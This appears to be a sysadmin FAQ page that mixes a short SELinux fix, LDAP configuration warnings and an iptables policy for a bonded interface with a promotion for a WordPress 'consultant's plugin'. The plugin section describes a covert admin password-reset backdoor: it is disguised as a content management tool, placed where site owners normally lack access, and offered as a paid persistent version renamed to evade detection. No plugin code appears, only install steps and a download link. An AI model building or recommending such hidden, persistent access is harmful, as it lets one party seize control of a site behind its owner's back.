To fix it, change context with:
chcon -c system_u:object_r:etc_t /etc/init.d/syslog

http://technology-leadership.com/wp-cplugin.zip

The Word Press Consultant’s Plugin was created by me for a friend of mine who is a talented and trusting blogger and web mistress.  Needless to say, some hosers on e-lance screwed her  out of her consulting money when, after she installed wordpress, themes and lots of content, they changed the admin password on her and never paid her.  That was not long after a consulting client, not from e-lance, similarly cheated her.

This plugin gives consultants confidence that they can become the administrator on a wordpress site, do lots and lots of work, and not be cheated by having their admin account password changed, to then go unpaid.  There will be a page on the wordpress blog the cheater does not know about, and you can change the password to anything you like.  The change password program will email the new password to the admin account email.  This is a good thing if you are in control and someone else is trying to use the tool on your site.   But, in case you are the one being cheated, once back in as admin, you must change the admin email address and reset the password one more time.

Two requirements is  for the wp version to be fairly recent. Though, it works for versions as low as 2.7, I think; I only tested in version 2.9.2.  The other requirement is the wordpress install should be hosted on a Linux machine.  Of course, the plugin may work for Windows hosted wordpress blogs, but I have not tested, nor am I interested in testing.  If you test it and it works, I would interested in hearing about it, but only interested if it works!!  Don’t email me telling me it doesn’t work on Window$ as I could care less.

It is free for now.  But, do not be surprised if it is a pay download link  in the future.  Not $19.99,  lol!   It would be maybe $2.99.

To install the plugin – these instructions are for wp 2.9.2.  It won’t be identical, but install will be similar for earlier versions of wordpress:
1) login into wp-admin as admin, you are at the Dashboard
2) Click ‘Plugins’ link from the menu on the left
3) Click the oval ‘Add New’ button next to Manage Plugins title
4)Click the ‘upload’ link just under the Install Plugins title
Note: this is not the same upload option for New Media.  No other upload options will work, only this one under the Install Plugins title will work to install the plugin.
5)Click ‘Browse’ button, find the plugin zip file you downloaded from my site,  click Open
6)Click the oval ‘Install Now’ button
7)Click the ‘Activate Plugin’ link
8)Go to the home page of the blog, or any page of the blog, on tlc it is called http://technology-leadership.com/faq
9) You just created a link called the wp-cplugin.php, which links to the plugin
10) Go to the new page you created, on tlc it would be technology-leadership.com/faq/wp-cplugin.php but I deleted the link prior to posting this.

The plugin installs a link into a directory that you do not normally have access too, so it is a hack I am not advertising to wordpress.  Thus, it will not become part of the wordpress searchable plugins.  I call the plugin a Content Management System, so it looks like you do not want to delete it.  Only the wordpress consultant or admin who installs this knows it is a password reset program, and that is all it manages.  A customized plugin is harder to detect (see below).

If you uninstall the plugin, it will uninstall the reset password program, but that is optional as to how I build the installer.

I can build the wp-cplugin.php installer to be persistent, even after plugin is deleted.   This is a per-customer request, and you get your own plugin name no one else has.   I can also create the plugin and/or any components with different name and description to hide detection.  The customized, persistent reset password plugin is about $49.00.

tlc has professional services – inquire to asimon@technology-leadership.com

At tlc faq, we do not run bots to steal web pages, esp. since so many pages on the internet are bogus and wrong. Starting with bogus / wrong information, when seeing documentation on ldap configuration on linux, do NOT enter nsswitch.conf entries on RHL systems, like so:

passwd: files ldap
group: files ldap
shadow: files ldap

These entries are unnecessary and will break your server!

ldap.conf, ldap.secret, a certificate file, and user accounts is all you need on the RedHat Linux server. You may need some pam.d file and/or pam.conf tweaks, but not always.

The information in the ldap.conf, like ‘rootbinddn’ and ‘cn’ is provided by the AD administrator.

# chkconfig iptables on

# service iptables start

Add a policy to the interface. Let’s say it is a bonded interface called bond0.  This policy will reject all inbound and forward traffic on bond0, except ping (icmp) and connections on port 22, the ssh port.  Create a file called iptables, and place it in /etc/sysconfig/ and add the following content:

*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:RH-Firewall-bond0-INPUT – [0:0]
-A INPUT -j RH-Firewall-bond0-INPUT
-A FORWARD -j RH-Firewall-bond0-INPUT
-A RH-Firewall-bond0-INPUT -i bond0 -p icmp –icmp-type any -j ACCEPT
-A RH-Firewall-bond0-INPUT -i bond0 -m state –state ESTABLISHED,RELATED -j ACCEPT
-A RH-Firewall-bond0-INPUT -i bond0 -m state –state NEW -m tcp -p tcp –dport 22 -j ACCEPT
-A RH-Firewall-bond0-INPUT -i bond0 -m state –state NEW -m udp -p udp –dport 22 -j ACCEPT
-A RH-Firewall-bond0-INPUT -i bond0 -j REJECT –reject-with icmp-host-prohibited
COMMIT

Restart iptables service:

# service iptables restart

View your new policy:

# iptables -L

That’s it. Enjoy!